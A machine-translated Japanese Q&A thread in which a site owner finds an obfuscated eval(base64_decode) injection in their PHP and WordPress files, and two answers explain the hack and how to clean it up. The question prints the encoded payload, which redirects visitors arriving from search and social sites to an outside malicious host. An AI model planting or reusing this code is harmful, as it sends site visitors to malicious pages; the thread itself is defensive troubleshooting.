1

最近、jquerymobileに気づきました-作成されたphpWebサイトがロードされていませんでした。関連するphpファイルを確認したところ、コードに余分な文字が含まれていることがわかりました。タグの直後に無関係な文字が表示されていました<?php。その理由は何ですか?私のウェブサイトはハッキングされていますか?すべてのファイルを回復するにはどうすればよいですか?これらのファイルには、コントロールパネルのログインを介してアクセスしています。Webサイトフォルダー外のファイル、一部のwpファイル(wp-config.php、wp-blog-header.phpなど)にもこれらの余分な文字が含まれていることがわかりました。

これは見つかった悪意のあるコードです-<?php eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVI

誰か、アドバイスしてください。

これが完全なコードです

eval(base64_decode( "/ KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw / c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vcGtqbGFwb2suMWR1bWIuY29tLyIpOw0KZXhpdCgpOw0KfQp9Cn0NCn0NCn0 = "));

4

2 に答える 2

3

直接の質問に答えるには:はい、あなたのサイトはハッキングされています。

eval(base64_decode(....))、実行されているコードの性質を偽装することを目的としていますが、PHPファイルに属していないコードがあるという事実を偽装することはできません。

ハッキングされたコードが何をするかについては、あなたがすべてを提供していないので、私はそれに答えることができません。

また、彼らがどのように侵入したのかについての質問にも答えることはできませんが、システム(またはWebホスティング会社のシステム)のどこかに、既知のセキュリティ上の欠陥があるソフトウェアパッケージがある可能性があります。

ほとんどの場合、この欠陥はそのソフトウェアのプロバイダーによって修正されていますが、ハッキングされたサイトのバージョンは最新の修正で更新されていないため、ハッカーに侵入する機会が与えられます。

サイトに侵入する方法は他にもありますが、これが最も可能性が高い方法です。

あなたのサイトをハッキングするためにどのソフトウェアが使用されたかはわかりません。関係する変数が多すぎて、私はそれについて十分に知りません。担当するすべてのソフトウェアが安全で最新バージョンを実行していることを確認し、ホスティング会社にそれらが完全に最新であることを確認することをお勧めします。

Wordpressについて名前で言及していませんが、指定したファイルはWordpressに属しているように聞こえます。したがって、ファイルを回復することは、ファイルを元のWordpressバージョンに更新する場合にすぎません。ただし、私が言っているように、最新のWPバージョンに更新する必要があります。これは、使用しているバージョンが古く、脆弱であるように思われるためです。

ページ内の実際のデータが危険にさらされている可能性がありますが、説明されているハッキングの性質は、PHPインジェクションハックのように聞こえるので、WPファイルを元の状態に戻すと、ページが復元されると思います。 。ただし、そこに予期しないものがまだ潜んでいないことを確認するために徹底的にチェックする必要があります。

[編集] これで完全なコードができました。コードが何をしているのかを簡単に確認できます。コードを小さなPHPプログラムにコピーし、に置き換えevalprint、実際に実行されているのではなく、実行されていることを確認できます。答えは、ユーザーがgooglebotなどではないことを確認し、そうでない場合は、ページを悪意のあるURLにリダイレクトすることです。

于 2012-09-25T16:39:09.600 に答える
2

これは、WordPressやその他の古いCMSの古いインストール、特に古いバージョンを使用してtimthumb画像を動的に操作するインストールでよくある問題です。

誰かがそのコードをおそらくほとんどの.PHPファイル(少なくともの空白行で開くファイル)の先頭に挿入しました<?php。これは数ヶ月前に私に起こりました。

eval()コードは、基本的に悪意のあるPHPコードを「暗号化」evalし、PHPファイルが開いたときに実行(使用)します。完全なbase64文字列を確認(およびデコード)せずにコードが何をするかを判断することは不可能ですが、それが私に起こったインジェクションのようなものである場合は、訪問者を悪意のあるページにリダイレクトするために、JavaScriptコードをサイトに追加します。 Webサイト内のリンクの動作を変更します。

これにつながった穴を見つけて閉じる必要があります。WordPressの古いバージョンの場合は、アップグレードしてください。疑わしいPOSTクエリがないかアクセスログを確認してください。

これを修正するために私が知っている唯一の方法は、ボックス上のすべてのPHPファイルからPHPコードを削除することです。Linuxのbashコマンドと高度なテキストエディタを使用して、各ファイルでコードが同一である場合に、複数のファイルからコードを削除できます。そうでない場合は、ファイル、メモ帳、山盛りのコーヒーを手に入れてください:)

于 2012-09-25T16:31:29.320 に答える